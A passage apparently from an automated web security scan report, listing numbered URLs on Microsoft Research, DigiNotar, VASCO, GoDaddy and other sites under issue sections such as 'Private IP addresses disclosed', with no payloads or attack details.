18.156. http://research.microsoft.com/en-us/people/kstrauss/
18.157. http://research.microsoft.com/en-us/people/larus/default.aspx
18.158. http://research.microsoft.com/en-us/people/lilich/
18.159. http://research.microsoft.com/en-us/people/lilich/default.aspx
18.160. http://research.microsoft.com/en-us/people/lintaoz/default.aspx
18.161. http://research.microsoft.com/en-us/people/liuj/default.aspx
18.162. http://research.microsoft.com/en-us/people/lomet/default.aspx
18.163. http://research.microsoft.com/en-us/people/luca/default.aspx
18.164. http://research.microsoft.com/en-us/people/malvar/
18.165. http://research.microsoft.com/en-us/people/malvar/default.aspx
18.166. http://research.microsoft.com/en-us/people/manuelc/default.aspx
18.167. http://research.microsoft.com/en-us/people/marycz/default.aspx
18.168. http://research.microsoft.com/en-us/people/mds/
18.169. http://research.microsoft.com/en-us/people/mds/default.aspx
18.170. http://research.microsoft.com/en-us/people/milanv/
18.171. http://research.microsoft.com/en-us/people/milanv/default.aspx
18.172. http://research.microsoft.com/en-us/people/mzh/
18.173. http://research.microsoft.com/en-us/people/najork/default.aspx
18.174. http://research.microsoft.com/en-us/people/pachou/default.aspx
18.175. http://research.microsoft.com/en-us/people/padmanab/default.aspx
18.176. http://research.microsoft.com/en-us/people/palarson/default.aspx
18.177. http://research.microsoft.com/en-us/people/parno/
18.178. http://research.microsoft.com/en-us/people/philbe/
18.179. http://research.microsoft.com/en-us/people/philbe/default.aspx
18.180. http://research.microsoft.com/en-us/people/ramjee/
18.181. http://research.microsoft.com/en-us/people/ranveer/default.aspx
18.182. http://research.microsoft.com/en-us/people/rashid/default.aspx
18.183. http://research.microsoft.com/en-us/people/richdr/default.aspx
18.184. http://research.microsoft.com/en-us/people/robertson/default.aspx
18.185. http://research.microsoft.com/en-us/people/roylevin/
18.186. http://research.microsoft.com/en-us/people/sdumais/default.aspx
18.187. http://research.microsoft.com/en-us/people/shuvendu/default.aspx
18.188. http://research.microsoft.com/en-us/people/simonpj/
18.189. http://research.microsoft.com/en-us/people/simonpj/default.aspx
18.190. http://research.microsoft.com/en-us/people/spli/
18.191. http://research.microsoft.com/en-us/people/surajitc/
18.192. http://research.microsoft.com/en-us/people/surajitc/default.aspx
18.193. http://research.microsoft.com/en-us/people/terry/default.aspx
18.194. http://research.microsoft.com/en-us/people/thekkath/default.aspx
18.195. http://research.microsoft.com/en-us/people/thoare/
18.196. http://research.microsoft.com/en-us/people/thoare/default.aspx
18.197. http://research.microsoft.com/en-us/people/tonyhey/default.aspx
18.198. http://research.microsoft.com/en-us/people/tsharp/
18.199. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx
18.200. http://research.microsoft.com/en-us/people/wobber/default.aspx
18.201. http://research.microsoft.com/en-us/people/wong/default.aspx
18.202. http://research.microsoft.com/en-us/people/wyma/
18.203. http://research.microsoft.com/en-us/people/zhao/default.aspx
18.204. http://research.microsoft.com/en-us/press/ablake.aspx
18.205. http://research.microsoft.com/en-us/press/anandan.aspx
18.206. http://research.microsoft.com/en-us/press/bainguo.aspx
18.207. http://research.microsoft.com/en-us/press/borgs.aspx
18.208. http://research.microsoft.com/en-us/press/cmbishop.aspx
18.209. http://research.microsoft.com/en-us/press/default.aspx
18.210. http://research.microsoft.com/en-us/press/fastfacts.aspx
18.211. http://research.microsoft.com/en-us/press/hon.aspx
18.212. http://research.microsoft.com/en-us/press/jchayes.aspx
18.213. http://research.microsoft.com/en-us/press/kevinsch.aspx
18.214. http://research.microsoft.com/en-us/press/kwood.aspx
18.215. http://research.microsoft.com/en-us/press/malvar.aspx
18.216. http://research.microsoft.com/en-us/press/mds.aspx
18.217. http://research.microsoft.com/en-us/press/overview.aspx
18.218. http://research.microsoft.com/en-us/press/rajamani.aspx
18.219. http://research.microsoft.com/en-us/press/roylevin.aspx
18.220. http://research.microsoft.com/en-us/press/telabbady.aspx
18.221. http://research.microsoft.com/en-us/projects/chem4word/default.aspx
18.222. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx
18.223. http://research.microsoft.com/en-us/projects/csec/
18.224. http://research.microsoft.com/en-us/projects/nodexl/
18.225. http://research.microsoft.com/en-us/projects/researchgames/
18.226. http://research.microsoft.com/en-us/projects/serviceos/
18.227. http://research.microsoft.com/en-us/projects/wwt/contest.aspx
18.228. http://research.microsoft.com/en-us/projects/wwt/default.aspx
18.229. http://research.microsoft.com/en-us/research/default.aspx
18.230. http://research.microsoft.com/en-us/um/people/awf/
18.231. http://research.microsoft.com/en-us/um/people/bahl/
18.232. http://research.microsoft.com/en-us/um/people/borgs/
18.233. http://research.microsoft.com/en-us/um/people/jchayes/
18.234. http://research.microsoft.com/en-us/um/people/szeliski/
18.235. http://research.microsoft.com/en-us/um/redmond/about/timeline/
18.236. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/
18.237. http://research.microsoft.com/en-us/um/redmond/projects/kinectsdk/download.aspx
18.238. http://research.microsoft.com/feedGen/
18.239. http://research.microsoft.com/nothing.html
18.242. http://vasco.com/company/contactus.aspx
18.244. http://vasco.com/favicon.ico
18.245. http://vasco.com/images/css/readmore_bg.gif
18.246. http://vasco.com/investor_relations/investor_press/investors_press.aspx
18.247. http://vasco.com/services/services.aspx
18.248. http://vasco.com/support/support_and_downloads.aspx
18.249. http://vasco.com/training/our_offering/elearning/certified_ethical_hacking.aspx
18.250. http://vasco.com/user_registration.aspx
18.251. http://vasco.com/verticals/appsecurity/online_application_security_overview.aspx
18.252. http://vasco.com/verticals/banking/onlinebanking.aspx
18.253. http://vasco.com/verticals/netsecurity/network_access_security.aspx
18.254. http://www.cheapssls.com/
18.255. http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
18.256. http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
18.257. http://www.cheapssls.com/geotrust-ssl-certificates/
18.258. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
18.259. http://www.cheapssls.com/geotrust-ssl-certificates/quickssl.html
18.260. http://www.cheapssls.com/geotrust-ssl-certificates/rapidssl.html
18.261. http://www.cheapssls.com/index.php
18.262. https://www.cheapssls.com/
18.263. https://www.cheapssls.com/index.php
18.264. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx
18.265. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx
18.266. http://www.godaddy.com/Payment/payment-options.aspx
18.267. http://www.godaddy.com/affiliates/affiliate-program.aspx
18.268. http://www.godaddy.com/gdshop/offers/cross_sell.asp
18.269. http://www.godaddy.com/ssl/ssl-certificates.aspx
18.270. http://www.hostnj.net/
18.271. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
18.272. http://www.meetup.com/
18.273. http://www.meetup.com/Boston-BizSpark-Meetup/
18.274. http://www.meetup.com/Boston-BizSpark-Meetup/events/30620321/
18.275. http://www.meetup.com/sponsorships/
18.276. http://www.meetup.com/whats_new/
18.277. http://www.microcad.ca/
18.278. http://www.microcad.ca/cart
18.279. http://www.microcad.ca/customerservice/about
18.281. https://www.microcad.ca/auth/login
18.282. https://www.microcad.ca/checkout/address
18.283. http://www.microsoft-careers.com/find.job
18.287. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/
18.291. http://www.microsoft-careers.com/search
18.292. https://www.microsoft-careers.com/
18.293. https://www.microsoft-careers.com/content/corporate-research/
18.294. https://www.microsoft-careers.com/find.job
18.295. https://www.microsoft-careers.com/find.job
18.296. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
18.298. https://www.microsoft-careers.com/talentcommunity/subscribe/
18.299. http://www.omniture.com/en/
18.300. http://www.register.com/
18.301. http://www.register.com/domain/searchresults.rcmx
18.302. http://www.register.com/unauthenticated_session_expired.rcmx
18.303. https://www.sslmatrix.com/Order/quickorder
18.304. https://www.sslmatrix.com/ssl-promotion-code
18.305. https://www.sslmatrix.com/ssl-promotion-code/ssl-price
18.306. http://www.vasco.com/favicon.ico
18.307. http://www.vasco.com/images/css/readmore_bg.gif
20.1. http://bh.contextweb.com/
20.2. http://content.etilize.com/
20.3. http://image2.pubmatic.com/
20.4. http://login.dotomi.com/
20.5. http://pixel.rubiconproject.com/
20.6. http://www.register.com/
20.7. http://www.shrinktheweb.com/
21.2. http://api.twitter.com/1/statuses/user_timeline/msnewengland.json
21.3. https://cart.godaddy.com/basket.aspx
21.4. http://diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js
21.5. http://diginotar.nl/Portals/_default/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js
21.6. http://diginotar.nl/controls/SolpartMenu/spmenu.js
21.7. http://frankgruber.me/post/9680693152/the-view-looking-out-from-techcocktail-boston-at
21.8. https://idp.godaddy.com/login.aspx
21.9. https://idp.godaddy.com/retrieveaccount.aspx
21.10. http://img3.wsimg.com/pc/js/1/gd_js_20110817.min.js
21.12. http://microsoftcambridge.com/Events/tabid/57/Default.aspx
21.13. http://microsoftcambridge.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
21.14. http://microsoftcambridge.com/Resources/Shared/scripts/widgets.js
21.15. http://microsoftcambridge.com/controls/SolpartMenu/spmenu.js
21.16. http://research.microsoft.com/en-us/about/contactus.aspx
21.17. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx
21.18. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx
21.19. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx
21.20. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx
21.21. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx
21.22. http://research.microsoft.com/en-us/events/escience2011/
21.23. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx
21.24. http://research.microsoft.com/en-us/labs/cmic/default.aspx
21.25. http://research.microsoft.com/en-us/labs/ilabs/default.aspx
21.26. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx
21.27. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx
21.28. http://research.microsoft.com/en-us/news/features/interns-080309.aspx
21.29. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx
21.30. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx
21.31. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx
21.32. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx
21.33. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx
21.34. http://research.microsoft.com/en-us/people/bycook/default.aspx
21.35. http://research.microsoft.com/en-us/people/gray/
21.36. http://research.microsoft.com/en-us/people/gray/default.aspx
21.37. http://research.microsoft.com/en-us/people/larus/default.aspx
21.38. http://research.microsoft.com/en-us/people/liuj/default.aspx
21.39. http://research.microsoft.com/en-us/people/padmanab/default.aspx
21.40. http://research.microsoft.com/en-us/people/palarson/default.aspx
21.41. http://research.microsoft.com/en-us/people/philbe/
21.42. http://research.microsoft.com/en-us/people/philbe/default.aspx
21.43. http://research.microsoft.com/en-us/people/ramjee/
21.44. http://research.microsoft.com/en-us/people/ranveer/default.aspx
21.45. http://research.microsoft.com/en-us/people/richdr/default.aspx
21.46. http://research.microsoft.com/en-us/people/simonpj/
21.47. http://research.microsoft.com/en-us/people/simonpj/default.aspx
21.48. http://research.microsoft.com/en-us/people/thekkath/default.aspx
21.49. http://research.microsoft.com/en-us/press/default.aspx
21.50. http://research.microsoft.com/en-us/projects/wwt/contest.aspx
21.51. http://research.microsoft.com/en-us/um/people/abegel/starlogo/starlogo-kybernetes-paper.doc
21.52. http://research.microsoft.com/en-us/um/people/bahl/
21.53. http://research.microsoft.com/en-us/um/people/blampson/
21.54. http://research.microsoft.com/en-us/um/people/borgs/
21.55. http://research.microsoft.com/en-us/um/people/heckerman/
21.56. http://research.microsoft.com/en-us/um/people/hjzhang/
21.57. http://research.microsoft.com/en-us/um/people/horvitz/
21.58. http://research.microsoft.com/en-us/um/people/jchayes/
21.59. http://research.microsoft.com/en-us/um/people/jgrudin/
21.60. http://research.microsoft.com/en-us/um/people/sdumais/
21.61. http://research.microsoft.com/en-us/um/people/ssaponas/
21.62. http://research.microsoft.com/en-us/um/people/szeliski/
21.63. http://research.microsoft.com/en-us/um/people/zhang/
21.64. http://research.microsoft.com/en-us/um/redmond/groups/ivm/ICE/
21.65. http://research.microsoft.com/en-us/um/redmond/groups/ivm/hdview/
21.66. http://research.microsoft.com/en-us/um/redmond/projects/songsmith/
21.67. http://scripts.omniture.com/javascript.js
21.68. http://shop.vasco.com/error_500.aspx
21.69. https://shop.vasco.com/legal.aspx
21.70. https://shop.vasco.com/privacy_statement.aspx
21.71. https://shop.vasco.com/terms_and_conditions.aspx
21.72. http://static.tumblr.com/fftf9xi/GXWlp9jjo/core.css
21.73. https://support.microsoft.com/contactus/emailcontact.aspx
21.74. http://twitter.com/account/bootstrap_data
21.76. http://vasco.com/js/rotating_banner.js
21.77. http://vasco.com/user_registration.aspx
21.78. http://w.sharethis.com/button/buttons.js
21.79. http://www.digicert.com/
21.80. http://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js
21.81. http://www.diginotar.com/Products/ExtendedValidationSSL/tabid/622/Default.aspx
21.82. http://www.diginotar.com/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx
21.83. http://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
21.84. http://www.diginotar.com/Resources/Shared/scripts/widgets.js
21.85. http://www.diginotar.com/controls/SolpartMenu/spmenu.js
21.86. http://www.diginotar.com/portals/0/PrivacyStatement.pdf
21.87. https://www.diginotar.com/Portals/0/Skins/DigiNotar_V7_COM/script/jqueryinnerfade.js
21.88. https://www.diginotar.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
21.89. https://www.diginotar.com/Resources/Shared/scripts/widgets.js
21.90. https://www.diginotar.com/controls/SolpartMenu/spmenu.js
21.91. http://www.diginotar.nl/Portals/7/Skins/Diginotar_v7_NL/script/jqueryinnerfade.js
21.92. http://www.diginotar.nl/controls/SolpartMenu/spmenu.js
21.93. http://www.dnncreative.com/Resources/Shared/scripts/DotNetNukeAjaxShared.js
21.94. http://www.dnncreative.com/Resources/Shared/scripts/widgets.js
21.95. http://www.dotnetnuke.com/News/Press-Releases/HTTP-Compression-Module.aspx
21.96. http://www.dotnetnuke.com/Resources/Wiki/page/Compression.aspx
21.97. http://www.godaddy.com/Payment/payment-options.aspx
21.98. http://www.godaddy.com/affiliates/affiliate-program.aspx
21.99. http://www.godaddy.com/gdshop/offers/cross_sell.asp
21.100. http://www.godaddy.com/ssl/ssl-certificates.aspx
21.101. http://www.hostnj.net/
21.102. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
21.103. http://www.hostnj.net/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js
21.104. http://www.microsoft-careers.com/find.job
21.108. http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/
21.112. http://www.microsoft-careers.com/search
21.113. https://www.microsoft-careers.com/
21.114. https://www.microsoft-careers.com/content/corporate-research/
21.115. https://www.microsoft-careers.com/find.job
21.116. https://www.microsoft-careers.com/go/Microsoft-Research-Jobs/217358/
21.118. https://www.microsoft-careers.com/talentcommunity/subscribe/
21.119. http://www.register.com/js/domain-taken.js
21.120. http://www.register.com/js/jquery.cookie.js
21.121. https://www.sslmatrix.com/script/jquery.hoverIntent.js
21.122. https://www.sslmatrix.com/script/jquery.jqGrid.min.js
21.123. https://www.sslmatrix.com/script/jquery_menu.js
21.124. http://www.vasco.com/js/rotating_banner.js
22. Private IP addresses disclosed
22.1. http://research.microsoft.com/Search
22.2. http://research.microsoft.com/apps/dp/areas.aspx
22.3. http://research.microsoft.com/apps/dp/blank.jpg
22.4. http://research.microsoft.com/apps/dp/dl/downloads.aspx
22.5. http://research.microsoft.com/apps/dp/downloads.aspx
22.6. http://research.microsoft.com/apps/dp/ev/events.aspx
22.7. http://research.microsoft.com/apps/dp/gr/groups.aspx
22.8. http://research.microsoft.com/apps/dp/groups.aspx
22.9. http://research.microsoft.com/apps/dp/i/reverse_
22.10. http://research.microsoft.com/apps/dp/ne/news.aspx
22.11. http://research.microsoft.com/apps/dp/news.aspx
22.12. http://research.microsoft.com/apps/dp/pe/people.aspx
22.13. http://research.microsoft.com/apps/dp/pr/projects.aspx
22.14. http://research.microsoft.com/apps/dp/projects.aspx
22.15. http://research.microsoft.com/apps/dp/pu/publications.aspx
22.16. http://research.microsoft.com/apps/dp/search.aspx
22.17. http://research.microsoft.com/apps/dp/search.aspx
22.18. http://research.microsoft.com/apps/dp/vi/videos.aspx
22.19. http://research.microsoft.com/apps/pubs/default.aspx
22.20. http://research.microsoft.com/apps/pubs/default.aspx
22.21. http://research.microsoft.com/apps/search/videosearch.ashx
22.22. http://research.microsoft.com/apps/video/default.aspx
22.23. http://research.microsoft.com/apps/video/default.aspx
22.24. http://research.microsoft.com/en-us/about/awards.aspx
22.25. http://research.microsoft.com/en-us/about/brochure-1.aspx
22.26. http://research.microsoft.com/en-us/about/brochure-2.aspx
22.27. http://research.microsoft.com/en-us/about/brochure-3.aspx
22.28. http://research.microsoft.com/en-us/about/brochure-4.aspx
22.29. http://research.microsoft.com/en-us/about/brochure-5.aspx
22.30. http://research.microsoft.com/en-us/about/brochure-6.aspx
22.31. http://research.microsoft.com/en-us/about/brochure-7.aspx
22.32. http://research.microsoft.com/en-us/about/brochure-8.aspx
22.33. http://research.microsoft.com/en-us/about/brochure-9.aspx
22.34. http://research.microsoft.com/en-us/about/contactus.aspx
22.35. http://research.microsoft.com/en-us/about/default.aspx
22.36. http://research.microsoft.com/en-us/about/directors.aspx
22.37. http://research.microsoft.com/en-us/about/feature/downloads.aspx
22.38. http://research.microsoft.com/en-us/about/paperawards.aspx
22.39. http://research.microsoft.com/en-us/collaboration/about/default.aspx
22.40. http://research.microsoft.com/en-us/collaboration/about/events.aspx
22.41. http://research.microsoft.com/en-us/collaboration/about/projects.aspx
22.42. http://research.microsoft.com/en-us/collaboration/about/summits.aspx
22.43. http://research.microsoft.com/en-us/collaboration/awards/default.aspx
22.44. http://research.microsoft.com/en-us/collaboration/awards/fellows-women.aspx
22.45. http://research.microsoft.com/en-us/collaboration/awards/fellowships.aspx
22.46. http://research.microsoft.com/en-us/collaboration/awards/opportunities.aspx
22.47. http://research.microsoft.com/en-us/collaboration/bg_txt.png
22.48. http://research.microsoft.com/en-us/collaboration/default.aspx
22.49. http://research.microsoft.com/en-us/collaboration/focus/cs/default.aspx
22.50. http://research.microsoft.com/en-us/collaboration/focus/e3/default.aspx
22.51. http://research.microsoft.com/en-us/collaboration/focus/education/default.aspx
22.52. http://research.microsoft.com/en-us/collaboration/focus/escience/default.aspx
22.53. http://research.microsoft.com/en-us/collaboration/focus/health/default.aspx
22.54. http://research.microsoft.com/en-us/collaboration/focus/nui/default.aspx
22.55. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/default.aspx
22.57. http://research.microsoft.com/en-us/collaboration/global/asia-pacific/talent/mstc.aspx
22.58. http://research.microsoft.com/en-us/collaboration/global/europe/default.aspx
22.59. http://research.microsoft.com/en-us/collaboration/global/europe/europe-awards.aspx
22.60. http://research.microsoft.com/en-us/collaboration/global/india/default.aspx
22.61. http://research.microsoft.com/en-us/collaboration/global/india/india-awards.aspx
22.62. http://research.microsoft.com/en-us/collaboration/global/india/phdfellowships.aspx
22.63. http://research.microsoft.com/en-us/collaboration/global/latam/default.aspx
22.64. http://research.microsoft.com/en-us/collaboration/global/latam/latam-awards.aspx
22.65. http://research.microsoft.com/en-us/collaboration/global/me-africa/default.aspx
22.66. http://research.microsoft.com/en-us/collaboration/global/northam/default.aspx
22.67. http://research.microsoft.com/en-us/collaboration/global/northam/northam-awards.aspx
22.68. http://research.microsoft.com/en-us/collaboration/institutes/default.aspx
22.69. http://research.microsoft.com/en-us/collaboration/tools/default.aspx
22.70. http://research.microsoft.com/en-us/community/default.aspx
22.71. http://research.microsoft.com/en-us/default.aspx
22.72. http://research.microsoft.com/en-us/default.aspx
22.73. http://research.microsoft.com/en-us/events/escience2011/
22.74. http://research.microsoft.com/en-us/events/indiaschooljune2011/
22.75. http://research.microsoft.com/en-us/events/women-in-computing2011/
22.76. http://research.microsoft.com/en-us/jobs/default.aspx
22.77. http://research.microsoft.com/en-us/jobs/default.aspx
22.78. http://research.microsoft.com/en-us/jobs/fulltime/default.aspx
22.79. http://research.microsoft.com/en-us/jobs/fulltime/researcher.aspx
22.80. http://research.microsoft.com/en-us/jobs/intern/about_asia-pacific.aspx
22.81. http://research.microsoft.com/en-us/jobs/intern/about_ca.aspx
22.82. http://research.microsoft.com/en-us/jobs/intern/about_india.aspx
22.83. http://research.microsoft.com/en-us/jobs/intern/about_uk.aspx
22.84. http://research.microsoft.com/en-us/jobs/intern/about_wa.aspx
22.85. http://research.microsoft.com/en-us/jobs/intern/cmic.aspx
22.86. http://research.microsoft.com/en-us/jobs/intern/default.aspx
22.87. http://research.microsoft.com/en-us/jobs/intern/russia.aspx
22.88. http://research.microsoft.com/en-us/labs/asia/default.aspx
22.89. http://research.microsoft.com/en-us/labs/cambridge/default.aspx
22.90. http://research.microsoft.com/en-us/labs/cmic/default.aspx
22.91. http://research.microsoft.com/en-us/labs/default.aspx
22.92. http://research.microsoft.com/en-us/labs/emic/default.aspx
22.93. http://research.microsoft.com/en-us/labs/fuse/default.aspx
22.94. http://research.microsoft.com/en-us/labs/ilabs/default.aspx
22.95. http://research.microsoft.com/en-us/labs/india/default.aspx
22.96. http://research.microsoft.com/en-us/labs/newengland/
22.97. http://research.microsoft.com/en-us/labs/newengland/default.aspx
22.98. http://research.microsoft.com/en-us/labs/redmond/default.aspx
22.99. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx
22.100. http://research.microsoft.com/en-us/labs/xcg/default.aspx
22.101. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx
22.102. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx
22.103. http://research.microsoft.com/en-us/news/features/interns-080309.aspx
22.104. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx
22.105. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx
22.106. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx
22.107. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx
22.108. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx
22.109. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx
22.110. http://research.microsoft.com/en-us/people/abadi/default.aspx
22.111. http://research.microsoft.com/en-us/people/adiamant/default.aspx
22.112. http://research.microsoft.com/en-us/people/ajbrush/default.aspx
22.113. http://research.microsoft.com/en-us/people/akashl/
22.114. http://research.microsoft.com/en-us/people/alecw/
22.115. http://research.microsoft.com/en-us/people/alexac/default.aspx
22.116. http://research.microsoft.com/en-us/people/aphillip/
22.117. http://research.microsoft.com/en-us/people/aproutie/
22.118. http://research.microsoft.com/en-us/people/aratan/default.aspx
22.119. http://research.microsoft.com/en-us/people/asellen/
22.120. http://research.microsoft.com/en-us/people/asellen/default.aspx
22.121. http://research.microsoft.com/en-us/people/bainguo/default.aspx
22.122. http://research.microsoft.com/en-us/people/bibuxton/default.aspx
22.123. http://research.microsoft.com/en-us/people/birrell/default.aspx
22.124. http://research.microsoft.com/en-us/people/blinn/default.aspx
22.125. http://research.microsoft.com/en-us/people/bycook/default.aspx
22.126. http://research.microsoft.com/en-us/people/cthacker/default.aspx
22.127. http://research.microsoft.com/en-us/people/dburger/
22.128. http://research.microsoft.com/en-us/people/dburger/default.aspx
22.129. http://research.microsoft.com/en-us/people/deng/default.aspx
22.130. http://research.microsoft.com/en-us/people/dmb/
22.131. http://research.microsoft.com/en-us/people/dmb/default.aspx
22.132. http://research.microsoft.com/en-us/people/dwork/
22.133. http://research.microsoft.com/en-us/people/gbell/default.aspx
22.134. http://research.microsoft.com/en-us/people/ggr/default.aspx
22.135. http://research.microsoft.com/en-us/people/goldberg/default.aspx
22.136. http://research.microsoft.com/en-us/people/grama/default.aspx
22.137. http://research.microsoft.com/en-us/people/gray/
22.138. http://research.microsoft.com/en-us/people/gray/default.aspx
22.139. http://research.microsoft.com/en-us/people/hon/default.aspx
22.140. http://research.microsoft.com/en-us/people/horvitz/default.aspx
22.141. http://research.microsoft.com/en-us/people/hsalama/default.aspx
22.142. http://research.microsoft.com/en-us/people/hshum/default.aspx
22.143. http://research.microsoft.com/en-us/people/indranim/
22.144. http://research.microsoft.com/en-us/people/jamiesho/
22.145. http://research.microsoft.com/en-us/people/jbishop/default.aspx
22.146. http://research.microsoft.com/en-us/people/jiansun/default.aspx
22.147. http://research.microsoft.com/en-us/people/johndo/default.aspx
22.148. http://research.microsoft.com/en-us/people/jplatt/default.aspx
22.149. http://research.microsoft.com/en-us/people/jtw/default.aspx
22.150. http://research.microsoft.com/en-us/people/krw/default.aspx
22.151. http://research.microsoft.com/en-us/people/kstrauss/
22.152. http://research.microsoft.com/en-us/people/larus/default.aspx
22.153. http://research.microsoft.com/en-us/people/lilich/
22.154. http://research.microsoft.com/en-us/people/lilich/default.aspx
22.155. http://research.microsoft.com/en-us/people/lintaoz/default.aspx
22.156. http://research.microsoft.com/en-us/people/liuj/default.aspx
22.157. http://research.microsoft.com/en-us/people/lomet/default.aspx
22.158. http://research.microsoft.com/en-us/people/luca/default.aspx
22.159. http://research.microsoft.com/en-us/people/malvar/
22.160. http://research.microsoft.com/en-us/people/malvar/default.aspx
22.161. http://research.microsoft.com/en-us/people/manuelc/default.aspx
22.162. http://research.microsoft.com/en-us/people/marycz/default.aspx
22.163. http://research.microsoft.com/en-us/people/mds/
22.164. http://research.microsoft.com/en-us/people/mds/default.aspx
22.165. http://research.microsoft.com/en-us/people/milanv/
22.166. http://research.microsoft.com/en-us/people/milanv/default.aspx
22.167. http://research.microsoft.com/en-us/people/mzh/
22.168. http://research.microsoft.com/en-us/people/najork/default.aspx
22.169. http://research.microsoft.com/en-us/people/pachou/default.aspx
22.170. http://research.microsoft.com/en-us/people/padmanab/default.aspx
22.171. http://research.microsoft.com/en-us/people/palarson/default.aspx
22.172. http://research.microsoft.com/en-us/people/parno/
22.173. http://research.microsoft.com/en-us/people/philbe/
22.174. http://research.microsoft.com/en-us/people/philbe/default.aspx
22.175. http://research.microsoft.com/en-us/people/ramjee/
22.176. http://research.microsoft.com/en-us/people/ranveer/default.aspx
22.177. http://research.microsoft.com/en-us/people/rashid/default.aspx
22.178. http://research.microsoft.com/en-us/people/richdr/default.aspx
22.179. http://research.microsoft.com/en-us/people/robertson/default.aspx
22.180. http://research.microsoft.com/en-us/people/roylevin/
22.181. http://research.microsoft.com/en-us/people/sdumais/default.aspx
22.182. http://research.microsoft.com/en-us/people/shuvendu/default.aspx
22.183. http://research.microsoft.com/en-us/people/simonpj/
22.184. http://research.microsoft.com/en-us/people/simonpj/default.aspx
22.185. http://research.microsoft.com/en-us/people/spli/
22.186. http://research.microsoft.com/en-us/people/surajitc/
22.187. http://research.microsoft.com/en-us/people/surajitc/default.aspx
22.188. http://research.microsoft.com/en-us/people/terry/default.aspx
22.189. http://research.microsoft.com/en-us/people/thekkath/default.aspx
22.190. http://research.microsoft.com/en-us/people/thoare/
22.191. http://research.microsoft.com/en-us/people/thoare/default.aspx
22.192. http://research.microsoft.com/en-us/people/tonyhey/default.aspx
22.193. http://research.microsoft.com/en-us/people/tsharp/
22.194. http://research.microsoft.com/en-us/people/wenwuzhu/default.aspx
22.195. http://research.microsoft.com/en-us/people/wobber/default.aspx
22.196. http://research.microsoft.com/en-us/people/wong/default.aspx
22.197. http://research.microsoft.com/en-us/people/wyma/
22.198. http://research.microsoft.com/en-us/people/zhao/default.aspx
22.199. http://research.microsoft.com/en-us/press/ablake.aspx
22.200. http://research.microsoft.com/en-us/press/anandan.aspx
22.201. http://research.microsoft.com/en-us/press/bainguo.aspx
22.202. http://research.microsoft.com/en-us/press/borgs.aspx
22.203. http://research.microsoft.com/en-us/press/cmbishop.aspx
22.204. http://research.microsoft.com/en-us/press/default.aspx
22.205. http://research.microsoft.com/en-us/press/fastfacts.aspx
22.206. http://research.microsoft.com/en-us/press/hon.aspx
22.207. http://research.microsoft.com/en-us/press/jchayes.aspx
22.208. http://research.microsoft.com/en-us/press/kevinsch.aspx
22.209. http://research.microsoft.com/en-us/press/kwood.aspx
22.210. http://research.microsoft.com/en-us/press/malvar.aspx
22.211. http://research.microsoft.com/en-us/press/mds.aspx
22.212. http://research.microsoft.com/en-us/press/overview.aspx
22.213. http://research.microsoft.com/en-us/press/rajamani.aspx
22.214. http://research.microsoft.com/en-us/press/roylevin.aspx
22.215. http://research.microsoft.com/en-us/press/telabbady.aspx
22.216. http://research.microsoft.com/en-us/projects/chem4word/default.aspx
22.217. http://research.microsoft.com/en-us/projects/creativecommons/default.aspx
22.218. http://research.microsoft.com/en-us/projects/csec/
22.219. http://research.microsoft.com/en-us/projects/nodexl/
22.220. http://research.microsoft.com/en-us/projects/researchgames/
22.221. http://research.microsoft.com/en-us/projects/serviceos/
22.222. http://research.microsoft.com/en-us/projects/wwt/contest.aspx
22.223. http://research.microsoft.com/en-us/projects/wwt/default.aspx
22.224. http://research.microsoft.com/en-us/research/default.aspx
22.225. http://research.microsoft.com/en-us/um/people/awf/
22.226. http://research.microsoft.com/en-us/um/people/bahl/
22.227. http://research.microsoft.com/en-us/um/people/borgs/
22.228. http://research.microsoft.com/en-us/um/people/jchayes/
22.229. http://research.microsoft.com/en-us/um/people/szeliski/
22.230. http://research.microsoft.com/en-us/um/redmond/about/timeline/
22.231. http://research.microsoft.com/feedGen/
22.232. http://research.microsoft.com/nothing.html
